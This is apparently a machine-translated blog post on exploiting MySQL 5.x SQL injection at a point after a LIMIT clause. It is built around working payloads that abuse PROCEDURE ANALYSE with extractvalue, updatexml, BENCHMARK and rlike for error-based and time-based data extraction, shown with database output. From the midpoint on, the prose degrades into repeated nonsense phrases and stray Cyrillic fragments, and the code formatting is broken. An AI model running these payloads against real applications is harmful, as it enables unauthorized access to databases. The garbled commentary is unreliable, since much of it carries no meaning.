Use method after the Limit keyword of Mysql injection

Details

In a test, I encountered an SQL injection problem. I did not find a solution on the Internet. At that time, the injection point was after the limit keyword, and the database was MySQL5.x, the SQL statement is similar to the following:

SELECT field FROM table WHERE id & gt; 0 order by id LIMIT [injection point]
The key to the problem is that the statement contains the order by keyword. We know that the union keyword can be used before the order by keyword in mysql. Therefore, if the order by keyword is not found before the injection point, the union keyword can be used smoothly, but now there is an order by keyword before the injection point. This problem lies in stackoverflow and sla. ckers has been discussed, but there is no effective solution.

Let's take a look at the select syntax in mysql 5.x:

SELECT
[ALL | DISTINCT | DISTINCTROW]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL _SMALL_RESULT] [SQL _BIG_RESULT] [SQL _BUFFER_RESULT]
[SQL _CACHE | SQL _NO_CACHE] [SQL _CALC_FOUND_ROWS]
Select_expr [, select_expr...]
[FROM table_references
[WHERE where_condition]
[Group by {col_name | expr | position}
[ASC | DESC],... [with rollup]
[HAVING where_condition]
[Order by {col_name | expr | position}
[ASC | DESC],...]
[LIMIT {[offset,] row_count | row_count OFFSET}]
[PROCEDURE procedure_name (argument_list)]
[Into outfile 'File _ name' export_options
| Into dumpfile 'File _ name'
| INTO var_name [, var_name]
[For update | lock in share mode]

The limit keyword is followed by the PROCEDURE and INTO keywords. The into keyword can be used to write files, but this is not important in this article. The focus here is the PROCEDURE keyword. by default, only ANALYSE (doc) is available for MySQL ).
Try this stored procedure:

Mysql & gt; SELECT field FROM table where id & gt; 0 order by id LIMIT 1, 1 procedure analyse (1 );
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
ANALYSE supports two parameters. Try two parameters:

Mysql & gt; SELECT field FROM table where id & gt; 0 order by id LIMIT 1, 1 procedure analyse (1, 1 );
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
Still invalid. Try to insert the SQL statement in ANALYSE:

Mysql & gt; SELECT field from table where id & gt; 0 order by id LIMIT 1, 1 procedure analyze (select IF (MID (version (), 1, 1) LIKE 5, sleep (5), 1), 1 );

The response is as follows:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyze'

It turns out that sleep has not been executed. In the end, I tried the following payload:

Mysql & gt; SELECT field FROM user WHERE id & gt; 0 order by id LIMIT 1, 1 procedure analyze (extractvalue (rand (), concat (0x3a, version ())), 1 );
ERROR 1105 (HY000): XPATH syntax error: ': 5.5.41-0ubuntu0. 14.04.1'

Aha, the above method is common error injection. Therefore, if the injection point supports error reporting, all problems are OK, but if the injection point does not report an error, you can also use time-based injection. The payload is as follows:

SELECT field FROM table WHERE id & gt; 0 order by id LIMIT 1, 1 PROCEDURE analyze (select extractvalue (rand (), concat (0x3a, (IF (MID (version (), 1, 1) LIKE 5, BENCHMARK (5000000, SHA1 (1), 1), 1)

Interestingly, sleep is not used, but BENCHMARK is used.

PHP plugin:
Mysql> SELECT host FROM mysql. user order by 1 LIMIT 0, 3/* SQL-inj */;
+ ----------- +
| Host |
+ ----------- +
| 127.0.0.1 |
|: 1 |
| Host |
+ ----------- +
3 rows in set (0.00 sec)
There are two major causes for failure. too many threads, please refer to the following link for more information: when there are too many threads, there are too many threads, when there are too many threads, there are too many threads, too many threads.
PHP plugin:

Mysql> SELECT host FROM mysql. user LIMIT 0 procedure analyse (2 ))); // when there are too many threads, there are too many threads in the queue.
Empty set (0.00 sec)

Mysql> SELECT host FROM mysql. user procedure analyse (2*2 );
ERROR 1108 (HY000): Incorrect parameters to procedure 'analyze'

// Please wait until there are too many attempts to handle these issues before they occur. Please wait until there are too many attempts to adjust the order by processing procedure analyse when there are too many attempts to handle these issues:
Mysql> SELECT host FROM mysql. user order by 1 LIMIT 0, 3 procedure analyse (4 );
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

When there are too many other users

When there are too many threads, there are too many threads, too many threads:
MySQL
When there are too many threads, there are too many threads, too many threads, when there are too many other users, there are too many other users, too many other users

Please refer to the following link for more information: when there are too many other users:
PHP plugin:
Mysql> SELECT 18446744073709551610 * if (SELECT 1) rlike 1, 2, 2 );

ERROR 1690 (22003): bigint unsigned value is out of range in '(18446744073709551610 * if (1 regexp 1 ))'

// When there are too many threads there, please rlike when there are too many threads there are too many regexp
There are two major causes for this problem:
PHP plugin:

Mysql> SELECT host FROM mysql. user LIMIT 0 procedure analyse (0, (SELECT 3 ));
Empty set (0.00 sec)

Mysql> SELECT host FROM mysql. user LIMIT 0 procedure analyse (0, (SELECT '3 '));
ERROR 1108 (HY000): Incorrect parameters to procedure 'analyze'

Mysql> SELECT host FROM mysql. user LIMIT 0 procedure analyse (0, (SELECT 3 union SELECT 2 LIMIT 1 ));
ERROR 1108 (HY000): Incorrect parameters to procedure 'analyze'

Mysql> SELECT host FROM mysql. user LIMIT 0 procedure analyse (0, (SELECT 3 order by sleep (1 )));
Empty set (0.00 sec)

Mysql> SELECT host FROM mysql. user order by 1 LIMIT 0 procedure analyse (0, (SELECT 3 order by/* SQL */));
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

There are two major causes for this problem, when there are too many threads, there will be too many threads, too many threads а з а и с ), please refer to the following link for more information. please refer to the following link for more information: when there are too many threads, there are too many threads, too many threads invalid. з а м т к 2 ):
Too many labels:

Mysql> SELECT host FROM mysql. user order by 1 LIMIT 0 procedure analyse (0, (SELECT 3 order by 1 rlike if (mid (version (), 1, 1) = 5, 0x00, 1 )));
ERROR 1139 (42000): Got error 'empty (sub) expression' from regexp

Mysql> SELECT host FROM mysql. user order by 1 LIMIT 0 procedure analyse (0, (SELECT 3 order by 1 rlike if (mid (version (), 1, 1) = 6, 0x00, 1 )));
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

Mysql> SELECT host FROM mysql. user order by 1 LIMIT 0 procedure analyse (0, (SELECT 3 order by updatexml (1, concat (0x3A, version (), 1 )));
ERROR 1105 (HY000): XPATH syntax error: ': 100'